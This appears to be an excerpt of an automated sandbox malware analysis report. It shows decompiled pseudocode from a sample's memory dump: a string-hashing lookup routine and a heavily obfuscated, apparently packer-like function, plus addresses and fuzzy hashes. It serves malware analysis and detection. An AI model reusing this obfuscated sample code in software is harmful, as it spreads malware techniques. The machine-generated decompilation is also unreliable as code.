								E00ADFA00(_t289, _t364, _t406, _v20);
								goto L77;
							}
							_t24 = _t418 - 1; // -1
							_t385 =  *((intOrPtr*)(_t426 + 8)) + (_t24 & (_v12 & 0x000000ff) + 0x164b2f3f + (((_t316 & 0x000000ff) * 0x00000025 + (_v28 & 0x000000ff)) * 0x00000025 + (_v36 & 0x000000ff)) * 0x00000025) * 4;
							_t316 = _v32;
							L21:
							_t406 = _v24;
							while(1) {
								_t385 =  *_t385;
								_v12 = _t385;
								if((_t385 & 0x00000001) != 0) {
									break;
								}
								if(_t316 == ( *(_t385 + 4) & _t406)) {
									L26:
									if(_t385 == 0) {
										goto L35;
									}
									_t177 = L00B8E7EB(_t385, _v16);
									if(_t177 != 0) {
										_t406 = _v12;
										goto L31;
									}
									_t385 = _v12;
									goto L18;
								}
							}
							_t385 = 0;
							_v12 = 0;
							goto L26;
						}
					}
					_t419 = _t404 - 1;
					if(_t419 == 0) {
						L15:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L16;
					}
					_t420 = _t419 - 1;
					if(_t420 == 0) {
						L14:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L15;
					}
					_t421 = _t420 - 1;
					if(_t421 == 0) {
						L13:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L14;
					}
					_t422 = _t421 - 1;
					if(_t422 == 0) {
						L12:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L13;
					}
					_t423 = _t422 - 1;
					if(_t423 == 0) {
						L11:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L12;
					}
					if(_t423 != 1) {
						goto L17;
					} else {
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L11;
					}
				} else {
					_t401 = _t403 >> 3;
					_t403 = _t403 + _t401 * 0xfffffff8;
					do {
						_t383 = ((((((_t425[1] & 0x000000ff) * 0x25 + (_t425[2] & 0x000000ff)) * 0x25 + (_t425[3] & 0x000000ff)) * 0x25 + (_t425[4] & 0x000000ff)) * 0x25 + (_t425[5] & 0x000000ff)) * 0x25 + (_t425[6] & 0x000000ff)) * 0x25 - _t289 * 0x2fe8ed1f;
						_t310 = ( *_t425 & 0x000000ff) * 0x1a617d0d;
						_t288 = _t425[7] & 0x000000ff;
						_t425 =  &(_t425[8]);
						_t289 = _t310 + _t383 + _t288;
						_t401 = _t401 - 1;
					} while (_t401 != 0);
					goto L3;
				}
			}






































































                            0x00b8e833
                            0x00b8e839
                            0x00b8e83e
                            0x00b8e841
                            0x00b8e848
                            0x00b8e84b
                            0x00b8e851
                            0x00b8e8b2
                            0x00b8e8b2
                            0x00b8e8b5
                            0x00b8e90b
                            0x00b8e911
                            0x00b8e913
                            0x00b8e913
                            0x00b8e91a
                            0x00b8e91d
                            0x00b8e922
                            0x00b8e924
                            0x00b8e924
                            0x00b8e924
                            0x00b8e92f
                            0x00b8e933
                            0x00b8e935
                            0x00b8e93a
                            0x00b8e940
                            0x00b8e948
                            0x00b8e950
                            0x00b8e955
                            0x00000000
                            0x00000000
                            0x00b8e957
                            0x00b8e95c
                            0x00b8e9cb
                            0x00b8e9d2
                            0x00b8e9d4
                            0x00b8e9f2
                            0x00b8e9f6
                            0x00b8ea10
                            0x00b8ea18
                            0x00b8ea1a
                            0x00b8ea1f
                            0x00b8ea2c
                            0x00b8ea2d
                            0x00b8ea2e
                            0x00b8ea32
                            0x00b8ea3d
                            0x00b8ea42
                            0x00b8ea45
                            0x00b8ea51
                            0x00b8ea60
                            0x00b8ea65
                            0x00b8ea68
                            0x00b8ea6a
                            0x00b8ea6a
                            0x00b8ea6a
                            0x00b8ea6f
                            0x00b8ea76
                            0x00b8ea7c
                            0x00b8ea7e
                            0x00b8ea81
                            0x00b8ea85
                            0x00b8ea88
                            0x00b8ea8c
                            0x00b8ea8f
                            0x00b8ea93
                            0x00b8ea98
                            0x00000000
                            0x00000000
                            0x00b8ea9a
                            0x00b8ea9d
                            0x00b8eaa2
                            0x00b8eb0e
                            0x00b8eb15
                            0x00b8eb17
                            0x00b8eb33
                            0x00b8eb36
                            0x00b8eb39
                            0x00b8eb3f
                            0x00b8eb45
                            0x00b8eb4a
                            0x00b8eb52
                            0x00b8ecb1
                            0x00b8ecb9
                            0x00b8ecbe
                            0x00b8ecc3
                            0x00b8ecc6
                            0x00b8eceb
                            0x00b8ecee
                            0x00b8ecf9
                            0x00b8ecfe
                            0x00b8ed00
                            0x00b8ed05
                            0x00b8ed07
                            0x00b8ed0a
                            0x00b8ed0c
                            0x00b8ed0e
                            0x00b8ed12
                            0x00b8ed19
                            0x00b8ed1e
                            0x00b8ed24
                            0x00b8ed2a
                            0x00b8ed2a
                            0x00b8ed2c
                            0x00b8ed3e
                            0x00b8ed3e
                            0x00b8eb5a
                            0x00b8eb62
                            0x00b8eb69
                            0x00000000
                            0x00000000
                            0x00b8eb6f
                            0x00b8eb75
                            0x00b8eb79
                            0x00b8eb79
                            0x00b8eb88
                            0x00b8eb8e
                            0x00b8eb90
                            0x00b8eb92
                            0x00b8eb97
                            0x00b8ed3f
                            0x00b8ed45
                            0x00000000
                            0x00000000
                            0x00b8ed4b
                            0x00b8ed4e
                            0x00000000
                            0x00b8eb9d
                            0x00b8eb9d
                            0x00b8eb9d
                            0x00b8eba2
                            0x00b8ebb5
                            0x00b8ebbc
                            0x00b8ebbe
                            0x00b8ebbe
                            0x00b8ebc3
                            0x00b8ebc5
                            0x00b8ebcb
                            0x00b8ebd2
                            0x00b8ebd5
                            0x00b8ebdb
                            0x00b8ebdf
                            0x00b8ebe1
                            0x00b8ebf0
                            0x00b8ebf9
                            0x00b8ec04
                            0x00b8ec07
                            0x00b8ec0a
                            0x00b8ec82
                            0x00b8ec85
                            0x00b8ec8b
                            0x00b8ec91
                            0x00b8ec93
                            0x00b8ec96
                            0x00b8ec9b
                            0x00b8eca6
                            0x00b8ecac
                            0x00b8ecae
                            0x00b8ecae
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00b8ec0c
                            0x00b8ec0c
                            0x00b8ec0c
                            0x00b8ec0f
                            0x00b8ec12
                            0x00b8ec15
                            0x00b8ec15
                            0x00b8ec18
                            0x00b8ec1e
                            0x00000000
                            0x00000000
                            0x00b8ec22
                            0x00b8ec28
                            0x00b8ec4b
                            0x00b8ec5b
                            0x00b8ec5d
                            0x00b8ec63
                            0x00b8ec65
                            0x00b8ec68
                            0x00b8ec6b
                            0x00b8ec6b
                            0x00b8ec70
                            0x00b8ec71
                            0x00b8ec74
                            0x00b8ec7d
                            0x00000000
                            0x00b8ebe3
                            0x00b8ebe3
                            0x00b8ebe6
                            0x00b8ebe6
                            0x00b8ebe7
                            0x00b8ebe9
                            0x00b8ebec
                            0x00000000
                            0x00b8ebe6
                            0x00b8ebe1
                            0x00b8eba4
                            0x00b8eba9
                            0x00b8ebb0
                            0x00b8ebb3
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00b8ebab
                            0x00b8ebab
                            0x00b8ebab
                            0x00b8ebac
                            0x00b8ebac
                            0x00000000
                            0x00b8ebab
                            0x00b8eb97
                            0x00b8eb19
                            0x00b8eb1c
                            0x00b8eb21
                            0x00b8eb26
                            0x00b8eb2c
                            0x00b8eb2c
                            0x00000000
                            0x00b8eb26
                            0x00b8ead6
                            0x00b8ead9
                            0x00b8eadc
                            0x00b8eadc
                            0x00b8eadc
                            0x00b8eade
                            0x00b8eae4
                            0x00000000
                            0x00000000
                            0x00b8eaee
                            0x00b8eaf7
                            0x00b8eaf9
                            0x00000000
                            0x00000000
                            0x00b8eb04
                            0x00b8eb12
                            0x00000000
                            0x00b8eb12
                            0x00b8eb06
                            0x00000000
                            0x00b8eb06
                            0x00b8eaf0
                            0x00b8eaf2
                            0x00b8eaf4
                            0x00000000
                            0x00b8eaf4
                            0x00b8ea6a
                            0x00b8ea21
                            0x00000000
                            0x00b8ea21
                            0x00b8e9d6
                            0x00b8e9d6
                            0x00b8e9e0
                            0x00b8e9e2
                            0x00b8e9e2
                            0x00b8e9e8
                            0x00000000
                            0x00b8e9e8
                            0x00b8e987
                            0x00b8e98f
                            0x00b8e992
                            0x00b8e995
                            0x00b8e995
                            0x00b8e998
                            0x00b8e998
                            0x00b8e99a
                            0x00b8e9a0
                            0x00000000
                            0x00000000
                            0x00b8e9a9
                            0x00b8e9b2
                            0x00b8e9b4
                            0x00000000
                            0x00000000
                            0x00b8e9ba
                            0x00b8e9c1
                            0x00b8e9cf
                            0x00000000
                            0x00b8e9cf
                            0x00b8e9c3
                            0x00000000
                            0x00b8e9c3
                            0x00b8e9ab
                            0x00b8e9ad
                            0x00b8e9af
                            0x00000000
                            0x00b8e9af
                            0x00b8e924
                            0x00b8e8b7
                            0x00b8e8ba
                            0x00b8e902
                            0x00b8e908
                            0x00b8e90a
                            0x00000000
                            0x00b8e90a
                            0x00b8e8bc
                            0x00b8e8bf
                            0x00b8e8f9
                            0x00b8e8ff
                            0x00b8e901
                            0x00000000
                            0x00b8e901
                            0x00b8e8c1
                            0x00b8e8c4
                            0x00b8e8f0
                            0x00b8e8f6
                            0x00b8e8f8
                            0x00000000
                            0x00b8e8f8
                            0x00b8e8c6
                            0x00b8e8c9
                            0x00b8e8e7
                            0x00b8e8ed
                            0x00b8e8ef
                            0x00000000
                            0x00b8e8ef
                            0x00b8e8cb
                            0x00b8e8ce
                            0x00b8e8de
                            0x00b8e8e4
                            0x00b8e8e6
                            0x00000000
                            0x00b8e8e6
                            0x00b8e8d3
                            0x00000000
                            0x00b8e8d5
                            0x00b8e8db
                            0x00b8e8dd
                            0x00000000
                            0x00b8e8dd
                            0x00b8e853
                            0x00b8e855
                            0x00b8e85b
                            0x00b8e85d
                            0x00b8e897
                            0x00b8e89c
                            0x00b8e8a2
                            0x00b8e8a6
                            0x00b8e8ab
                            0x00b8e8ad
                            0x00b8e8ad
                            0x00000000
                            0x00b8e85d

                            Memory Dump Source
                            • Source File: 00000009.00000002.408286110.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_a90000_WZ454554.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a65c7f7d13e4079d4bb41a6988aa8451ff0e7f86cd20567f19d92afe2b8129c9
                            • Instruction ID: 64887a8ee92664ec79eacac7bf49e1328c4141d5bf433af02dcae4e227bc79a5
                            • Opcode Fuzzy Hash: a65c7f7d13e4079d4bb41a6988aa8451ff0e7f86cd20567f19d92afe2b8129c9
                            • Instruction Fuzzy Hash: 7602A172E006169BCB18DFA9C9D167EBBF5EF88300B1981ADD466EB391D734E901CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0041DAA0, Relevance: .5, Instructions: 474COMMONCrypto
                            Download Yara Rule
                            C-Code - Quality: 56%
                            			E0041DAA0(signed char __eax, void* __ecx, signed int __edx, signed int __edi, signed int __esi) {
				signed char _t65;
				signed char _t68;
				signed int _t69;
				void* _t75;
				void* _t80;
				void* _t82;
				intOrPtr _t83;
				signed int _t90;
				signed int _t100;
				signed int _t105;

				_t107 = __esi;
				_t100 = __edi;
				_t90 = __edx;
				_t65 = __eax;
				asm("lodsb");
				asm("scasb");
				 *0x8154a9f =  *0x8154a9f << 0x3e;
				if(__eax >  *0xf0a3e8e7) {
					__ebx =  *0x847fa7e * 0x1f4b;
					_t30 = __eax;
					__eax =  *0xebddde1b;
					 *0xebddde1b = _t30;
					 *0xa1084700 = __ch;
					asm("ror dword [0xbf77c52f], 0x60");
					_pop(__esp);
					__esp =  *0x8b0847f5;
					 *0xe9ec1b27 =  *0xe9ec1b27 >> 0x6b;
					__ecx = __ecx | 0x09470cff;
					asm("sbb ecx, [0xd7581cfa]");
					_push(__edx);
					__ebp = __ebp ^ 0x27254d09;
					__ebp = __ebp + 0x5704e0f0;
					__esp = 0x390952cf;
					__cl = __cl -  *0x1ba94db7;
					 *0x52d86a20 =  *0x52d86a20 + __ch;
					asm("rcr byte [0x4a3f3d0a], 0x8b");
					_push( *0xaa1cbf1b);
					__ebp = __ebp - 1;
					asm("adc [0x260bb5a1], ebx");
					 *0xd8da0a02 =  *0xd8da0a02 + __cl;
					 *0x8aa43234 =  *0x8aa43234 << 0x18;
					_pop(__edx);
					__ebx =  *0xade908c5;
					__edx = __edx &  *0x5abfdc6c;
					__eax =  *0xebddde1b ^  *0x1d1147f4;
					__edx = __edx + 1;
					asm("rcr dword [0x6486fc8], 0xa7");
					asm("rol dword [0xb50e7feb], 0xd0");
					asm("ror dword [0x145e1d93], 0x8c");
					if(__edx == 0) {
						asm("sbb [0x81da2d7b], esp");
						asm("adc ebp, 0xb6c58d6d");
						__esp =  *0xcec30703;
						asm("adc edi, [0x92e3dc31]");
						asm("adc edi, 0x7f86c825");
						__dl = __dl &  *0xb0fe1012;
						if(__dl >= 0) {
							asm("adc esi, 0xfccbe572");
							__dl = __dl ^  *0xa06d4db4;
							__ebp = __ebp |  *0x415fb20e;
							__edi = __edi &  *0xb8b43ce;
							__ebx = __ebx ^  *0x181c929;
							__esp = __esp -  *0xafc184fb;
							asm("sbb ebx, [0x6c54f2e]");
							__cl = __cl - 0x32;
							__ebx = __ebx &  *0xf20ff429;
							__ebx = __ebx - 1;
							asm("rcr byte [0x9b1a0a0c], 0x24");
							__edi = __edi - 1;
							__eax = __eax +  *0xe5e624da;
							__ebx = __ebx &  *0x86db3edf;
							 *0x15950689 = __edi;
							asm("rcr dword [0x60480716], 0x41");
							if((__al & 0x00000000) != 0) {
								asm("scasb");
								 *0xc818aece =  *0xc818aece << 0xc4;
								L1();
								 *0x4d8c8be8 =  *0x4d8c8be8 >> 0xdc;
								_pop(__edx);
								__edi = __edi | 0x9199b911;
								__ecx = __ecx +  *0xbf755f67;
								 *0xa3de2a8a =  *0xa3de2a8a + __dh;
								__dh = __dh +  *0x62ac12e1;
								__al = __al |  *0x6f1c5ee0;
								 *0x81fa28c8 =  *0x81fa28c8 << 0xa6;
								asm("sbb ebx, 0x710ade8f");
								__esp = __esp + 1;
								__ecx = __ecx |  *0x5fb8a61b;
								asm("sbb ah, 0x1c");
								_t39 = __esp;
								__esp =  *0xa60f5a0e;
								 *0xa60f5a0e = _t39;
								__bl =  *0xc562b538;
								asm("adc [0xa4105395], esi");
								 *0xf96768ea =  *0xf96768ea & __ecx;
								__esi = __esi -  *0xa79a4b21;
								asm("sbb [0x9b8c268d], ecx");
								 *0x51220413 =  *0x51220413 >> 0xba;
								 *0x751678ea =  *0x751678ea >> 0xbc;
								__esp =  *0xa60f5a0e &  *0x57180807;
								__bh = __bh |  *0xce514b02;
								__edi =  *0xb1d7438e;
								asm("adc [0x44999606], esp");
								_pop(__edi);
								 *0x35324a6e =  *0x35324a6e >> 0x65;
								 *0xf870cf34 =  *0xf870cf34 << 0x36;
								__ebx = 0x66ebccf8;
								_t44 = __eax;
								__eax =  *0x5956e219;
								 *0x5956e219 = _t44;
								 *0x6499ebf =  *0x6499ebf - __ebp;
								__ch = __ch & 0x00000030;
								_push(0x66ebccf8);
								__ecx = __ecx - 1;
								_t47 = __esi;
								__esi =  *0x8b13da97;
								 *0x8b13da97 = _t47;
								 *0x6b4287a1 =  *0x6b4287a1 & __ecx;
								 *0xc15ada3a =  *0xc15ada3a >> 3;
								 *0xbf6bc7fa =  *0xbf6bc7fa >> 0xff;
								asm("ror byte [0x7111aa2a], 0x3");
								asm("stosb");
								__ah =  *0x7b808ab4;
								 *0x11e336b2 =  *0x11e336b2 ^ __bh;
								__ebx = 0x66ebccf9;
								 *0x97db7cd8 =  *0x97db7cd8 + __ebp;
								__edi = 0x5811f068;
								__ebx = 0x6efbfdff;
								__esi =  *0x8b13da97 == 1;
								asm("movsw");
								if( *0x8b13da97 == 1) {
									__edi = 0xfffffffff70a69f3;
									__cl = __cl |  *0xbb6a92b6;
									asm("adc dh, 0xe7");
									_pop(__esi);
									asm("rcl dword [0x540a8919], 0x7b");
									 *0xe96ceb06 =  *0xe96ceb06 << 0x50;
									 *0xd1dbd727 = __esi;
									__ebx =  *0xe213f169 * 0xd862;
									 *0x29300cf9 =  *0x29300cf9 - __al;
									asm("scasd");
									__eax = __eax - 1;
									asm("sbb edx, [0x4ad7df0f]");
									asm("adc ebx, 0x1059f16f");
									__ebx =  *0xe213f169 * 0xd862 +  *0x97d102cd;
									__dh = __dh &  *0x3aacd6b1;
									asm("adc [0xf526e9ca], bl");
									asm("ror byte [0x6b9a4ae3], 0x90");
									 *0x95699fb4 =  *0x95699fb4 - __ch;
									asm("sbb al, [0xe602728]");
									_pop(__eax);
									__esp = __esp +  *0xd008250e;
									__edi = 0xfffffffff70a69f3 -  *0xc36bb8f3;
									__eax = __eax -  *0x1347ef61;
									__esi = __esi - 1;
									__edx = __edx + 0xc040c1fb;
									 *0x24074de =  *0x24074de & __esi;
									asm("rol dword [0x220fe59a], 0xdf");
									__ebx =  *0xe213f169 * 0x0000d862 +  *0x97d102cd ^  *0xbdf39ad8;
									asm("sbb cl, 0xe5");
									asm("movsb");
									if(( *0x7314edc0 & __eax) < 0) {
										__eax =  *0xb671617d * 0xeeac;
										 *0x7005ed8c =  *0x7005ed8c >> 0xfe;
										 *0xc7b4c41b =  *0xc7b4c41b >> 0xb;
										asm("rcl dword [0x137f7ec0], 0x80");
										 *0x2683f881 = 0x5811f068;
										__edi = __edi & 0xdbe3620e;
										asm("rcl dword [0x2a45e107], 0x2a");
										asm("adc [0xbdf39ad8], eax");
										_t50 = __ebx;
										__ebx =  *0x1713edc0;
										 *0x1713edc0 = _t50;
										 *0xb671617d * 0xeeac - 0x8a328fa3 =  *0xb671617d * 0x0000eeac - 0x8a328fa3 |  *0x1ed1581e;
										__al = __al &  *0x313bb2d2;
										__ebp = __ebp -  *0xbdf39ada;
										asm("adc [0xc209edc0], ebp");
										__ch = __ch - 0xb4;
										asm("sbb [0x200f23], eax");
										 *0xa0e52ce = __esp;
										__edi = __edi ^  *0x87f17583;
										__esi =  *0xf0c768fa;
										__ecx = __ecx ^  *0xa6adce11;
										__cl = 0x63;
										asm("adc esi, 0x651032f5");
										__ecx = __ecx |  *0x25fb536c;
										_pop(__esi);
										__ebp = __ebp +  *0x9abaea11;
										__eax = ( *0xb671617d * 0x0000eeac - 0x8a328fa3 |  *0x1ed1581e) &  *0x17f1d901;
										__ebx =  *0x1713edc0 - 0xe11e768f;
										_push( *0x1713edc0 - 0xe11e768f);
										 *0x25fb536c =  *0x25fb536c << 0x2e;
										_pop(__esi);
										 *0xb8f48916 =  *0xb8f48916 & __ebp;
										asm("ror dword [0xb57a759c], 0xc");
										__esi =  *0xef7ce81e;
										 *0xef7ce81e =  *0xf0c768fa;
										_pop(__ebx);
										__esp = __esp |  *0xf2dde43e;
										 *0x2e5a77bb =  *0x2e5a77bb >> 0xa;
										_pop(__edi);
										 *0xaff615e3 =  *0xaff615e3 << 0xf3;
										asm("stosd");
										 *0xa6928180 =  *0xa6928180 & __ch;
										_pop(__edi);
										asm("lodsb");
										if( *0xa6928180 >= 0) {
											__esp = __esp |  *0x669bebef;
											__ch = __ch ^ 0x000000e4;
											 *0xcf4fab0 = __ch;
											 *0xefdb9ea1 =  *0xefdb9ea1 >> 0x7b;
											__esp = __esp | 0xd10fb796;
											asm("ror dword [0x86b4589d], 0x89");
											__dh = __dh |  *0xf1e93512;
											asm("sbb ecx, [0x67aa7864]");
											__ecx = __ecx + 0x55f01a8d;
											__ecx = __ecx +  *0xde4a118b;
											 *0x2752b82 =  *0x2752b82 - __dh;
											if( *0x2752b82 >= 0) {
												__ecx =  *0x2f77397c * 0x5af7;
												 *0x25fb536c =  *0x25fb536c | __esp;
												_pop(__esi);
												_t60 = __ebx;
												__ebx =  *0xd748cf19;
												 *0xd748cf19 = _t60;
												asm("adc ah, [0x208d6688]");
												asm("sbb ecx, [0x1b5096df]");
												__edx =  *0x30c6381;
												asm("adc ecx, 0x406cd5ce");
												__bl = __bl +  *0xf27762b2;
												asm("sbb bh, [0x142e0d30]");
												__ch = __ch - 0x2a;
												asm("rcr dword [0x4ef87103], 0x4a");
												__esp = __esp - 1;
												__esp = __esp - 1;
												_t61 = __ah;
												__ah =  *0x82ef66a0;
												 *0x82ef66a0 = _t61;
												_push(0x227f0011);
												asm("ror dword [0xd4bda3c7], 0xbf");
												__edi = 0x2ecd1f8d;
												__edx =  *0x30c6381 | 0xfb536c6f;
												asm("rol byte [0xdf831c63], 0xfe");
												asm("rcr dword [0x373f92fa], 0x86");
												__eax = __eax + 1;
												asm("adc cl, 0x1c");
												asm("sbb esi, 0x5153a568");
												 *0x3fc00f04 =  *0x3fc00f04 | __bl;
												 *0x190b82f8 =  *0x190b82f8 + __ebx;
												__edx = ( *0x30c6381 | 0xfb536c6f) ^ 0xe54db5bb;
												__bh = __bh - 0x24;
												asm("adc eax, [0xa9cf1e0e]");
												asm("sbb [0xdfa81d2f], edi");
												 *0xbf0d8bb =  *0xbf0d8bb - __ebx;
												_t62 = __esi;
												__esi =  *0x5ced1761;
												 *0x5ced1761 = _t62;
												 *0xbfe9d6ca =  *0xbfe9d6ca ^ __dh;
												asm("stosb");
												_t63 = __ch;
												__ch =  *0x64e5bf63;
												 *0x64e5bf63 = _t63;
												 *0x66a4f1ff =  *0x66a4f1ff ^ 0x2ecd1f8d;
												asm("rol byte [0xf4fab0e4], 0x1f");
												__bh = __bh ^  *0x8fcd010c;
												asm("sbb ebp, 0xd75ed0c1");
												 *0xba65dda0 =  *0xba65dda0 << 0xbc;
												__ch =  *0x5da50e86;
												 *0x5da50e86 =  *0x64e5bf63;
												__edx = 0xcb25b42f;
											}
										}
									}
								}
							}
						}
					}
				}
				while(1) {
					L1:
					_t1 = _t100;
					_t100 =  *0x4e918f09;
					 *0x4e918f09 = _t1;
					_pop(_t80);
					 *0xa66a5a10 =  *0xa66a5a10 >> 0xc0;
					_push(_t90);
					asm("adc eax, 0x980d3a0d");
					_t69 = _t69 +  *0x6f9edab2;
					if(_t69 != 0) {
						continue;
					}
					L2:
					asm("rcl dword [0x8868c6f], 0x49");
					asm("rol dword [0x4383061f], 0xf8");
					asm("adc dl, 0xd0");
					 *0x7cb3ff89 =  *0x7cb3ff89 << 0x17;
					asm("ror byte [0x951382f9], 0x55");
					asm("rcl byte [0xbf10edd2], 0xf4");
					asm("cmpsb");
					_push( *0xf9feb0f1);
					_t82 = _t80 -  *0xf499e805 +  *0xf0ff642a;
					asm("rcr dword [0x780d73ee], 0x62");
					_t100 =  *0x70a0469 * 0x0000b50b ^ 0x09b5da6d;
					 *0x1f0f7d81 = (_t112 |  *0x5b0c82cb) &  *0x96659a1d &  *0xda0d7cfd;
					 *0x9df0b83 =  *0x9df0b83 ^ _t110;
					_push(_t90 +  *0xdf0cf91e);
					asm("sbb esp, [0x940a7c33]");
					asm("adc edx, [0xab58bb8]");
					_t107 = _t107 -  *0xf19dedf8;
					_push( *0xb8fb7a64);
					asm("rcr byte [0xda0fb58a], 0xc7");
					asm("adc [0x9ba0a6c0], ebp");
					asm("adc [0x24ca1789], eax");
					_pop(_t112);
					_pop(_t90);
					_t69 = 0x00000012 &  *0x52bdba38;
					asm("adc ecx, [0xc1fd87c1]");
					if(_t69 <= 0) {
						while(1) {
							L1:
							_t1 = _t100;
							_t100 =  *0x4e918f09;
							 *0x4e918f09 = _t1;
							_pop(_t80);
							 *0xa66a5a10 =  *0xa66a5a10 >> 0xc0;
							_push(_t90);
							asm("adc eax, 0x980d3a0d");
							_t69 = _t69 +  *0x6f9edab2;
							if(_t69 != 0) {
								continue;
							}
							goto L2;
							do {
								do {
									do {
										do {
											do {
												goto L1;
											} while (_t69 != 0);
											goto L2;
										} while (_t69 <= 0);
										goto L3;
									} while (0x5ac94fc2 !=  *0x88617);
									 *0x822e4175 =  *0x822e4175 + _t90;
									asm("lodsd");
									asm("ror byte [0x35cb640c], 0xa6");
									_pop(_t90);
								} while (( *0x242ca22f & _t65) <= 0);
								 *0xf1163176 =  *0xf1163176 >> 0x1b;
								 *0x3cdb5896 =  *0x3cdb5896 - _t83;
								 *0x7a405a21 =  *0x7a405a21 >> 0x43;
								_t90 = _t90 ^  *0xdcabb365;
								_t110 = _t110 + 1;
								 *0xe8444198 =  *0xe8444198 - _t83;
								_t107 = 0xa68ca1bf;
								_pop(_t105);
								_t112 = 0x7ac9cfef;
								_t75 = (_t69 & 0x5bf585b9) + 1;
								_t100 = _t105 ^ 0xb3a739dc;
								_push(_t75);
								asm("rol dword [0x94c5221d], 0xa7");
								asm("scasb");
								asm("adc esp, [0x1fdc62be]");
								asm("rcr dword [0xafd20bc5], 0xc2");
								 *0xbd3c891c =  *0xbd3c891c | _t90;
								_t65 =  *0x810e0204 +  *0xb52ca2b | 0x00000063;
								_t69 = _t75 + 0xec51fdc;
							} while (_t69 < 0);
							_t107 = 0xee01c2c1;
							 *0xe8a8eb3f = _t83;
							asm("scasb");
							_t110 = 0x2a90990e;
							asm("sbb ecx, 0xf62c66ba");
							 *0xf0c65ed0 =  *0xf0c65ed0 + _t65;
							 *0x72a60112 =  *0x72a60112 + _t69;
							asm("rcl dword [0x5d1161fb], 0x4f");
							_t69 =  *0xa8ec40e0;
							_t90 = _t90 ^  *0x36a9e570 ^ 0x1358b2f5;
							 *0x128b51bf =  *0x128b51bf ^ 0x5ac94fc2;
							 *0xa7feea09 =  *0xa7feea09 ^ _t90;
							if( *0xa7feea09 >= 0) {
								continue;
							} else {
								 *0xb0fd9171 =  *0xb0fd9171 >> 0xbf;
								asm("adc ecx, [0x8f4689c4]");
								_push(_t65);
								 *0x8878b5f0 =  *0x8878b5f0 >> 0x21;
								 *0x1082ec62 =  *0x1082ec62 - _t90 -  *0xc84575cf;
								asm("adc dl, 0x2c");
								_t68 = _t65 + 1;
								 *0x585c1085 =  *0x585c1085 - 0xee01c2c1;
								_t112 = 0x7ac9cfee;
								_t25 = _t69 +  *0x9a0a0d8b;
								_t69 =  *0xa9e81204;
								 *0xa9e81204 = _t25;
								_push(_t68);
								_push(0xee01c2c1);
								_push( *0x35725789);
								asm("sbb esp, 0xd9c74b8b");
								asm("adc [0xc2f62811], ebp");
								_t107 =  *0xde44259d;
								asm("ror dword [0x917f70ce], 0x96");
								asm("sbb [0x2b1b6cc6], dh");
								 *0x162166d7 =  *0x162166d7 >> 0x95;
								asm("rcl byte [0x214fbe0], 0x35");
								_pop( *0x976486eb);
								_t100 = _t100 -  *0x4958bfce & 0xcba58667;
								 *0x36f78fd9 =  *0x36f78fd9 ^ _t69;
								_t65 = _t68 | 0x000000b3;
								asm("sbb ecx, 0x2a7c4d8b");
								_t110 = 0x2a90990d;
								 *0x1e7fcc2c =  *0x1e7fcc2c & _t65;
								 *0xf56ff2 =  *0xf56ff2 | _t65;
								asm("movsw");
								asm("adc ebx, [0x3309b1ef]");
								_push(0x2a90990e);
								_t90 =  *0xfc6be122;
								asm("ror byte [0x80f25c10], 0xf7");
								asm("rcr dword [0xe2e88afd], 0x1a");
								if( *0x35ec85e7 >= _t65) {
									continue;
								} else {
									return _t65;
								}
							}
						}
					}
					L3:
					asm("sbb edx, 0x8b51c82f");
					_t107 = _t107 &  *0x24ea04f3;
					asm("rcr dword [0xe62d5507], 0x8c");
					_t110 = 0xd247a42b ^  *0xee6087c7;
					_push(0xe7886bc7);
					asm("sbb [0x2895ebea], esp");
					asm("sbb al, 0x63");
					 *0x1c64d583 =  *0x1c64d583 >> 0xa8;
					asm("sbb [0x4526e43b], esp");
					L1();
					_t83 = _t82 +  *0x47da23c2;
					 *0xf978503d = _t112 +  *0xfde82fed;
					_push( *0x36fd66c2);
					asm("sbb ebp, [0xbbbb159d]");
					_push( *0x34ca6dd5);
					asm("sbb [0xdc425ef8], esi");
					 *0xc0e241f3 = _t100 &  *0x413671e8;
					_t100 =  *0xfefdef33;
					 *0xfefdef33 =  *0xc0e241f3;
					 *0xd127d585 =  *0xd127d585 >> 0x90;
					 *0xe2375439 = _t83;
					_t112 = 0x5ac94fc2;
					_t69 = 0xd93f8d01;
					_pop(_t90);
					L1:
					_t1 = _t100;
					_t100 =  *0x4e918f09;
					 *0x4e918f09 = _t1;
					_pop(_t80);
					 *0xa66a5a10 =  *0xa66a5a10 >> 0xc0;
					_push(_t90);
					asm("adc eax, 0x980d3a0d");
					_t69 = _t69 +  *0x6f9edab2;
				}
			}













                            0x0041daa0
                            0x0041daa0
                            0x0041daa0
                            0x0041daa0
                            0x0041daa0
                            0x0041daa1
                            0x0041daa3
                            0x0041dab1
                            0x0041dab7
                            0x0041dac1
                            0x0041dac1
                            0x0041dac1
                            0x0041dac7
                            0x0041dacd
                            0x0041dad4
                            0x0041dad5
                            0x0041dadb
                            0x0041dae2
                            0x0041daee
                            0x0041daf4
                            0x0041daf5
                            0x0041dafb
                            0x0041db01
                            0x0041db06
                            0x0041db0c
                            0x0041db12
                            0x0041db19
                            0x0041db1f
                            0x0041db20
                            0x0041db26
                            0x0041db2c
                            0x0041db33
                            0x0041db34
                            0x0041db3a
                            0x0041db40
                            0x0041db4c
                            0x0041db4d
                            0x0041db54
                            0x0041db5b
                            0x0041db62
                            0x0041db68
                            0x0041db6e
                            0x0041db74
                            0x0041db7a
                            0x0041db80
                            0x0041db86
                            0x0041db8c
                            0x0041db92
                            0x0041db98
                            0x0041db9e
                            0x0041dba4
                            0x0041dbaa
                            0x0041dbb0
                            0x0041dbb6
                            0x0041dbbc
                            0x0041dbbf
                            0x0041dbc5
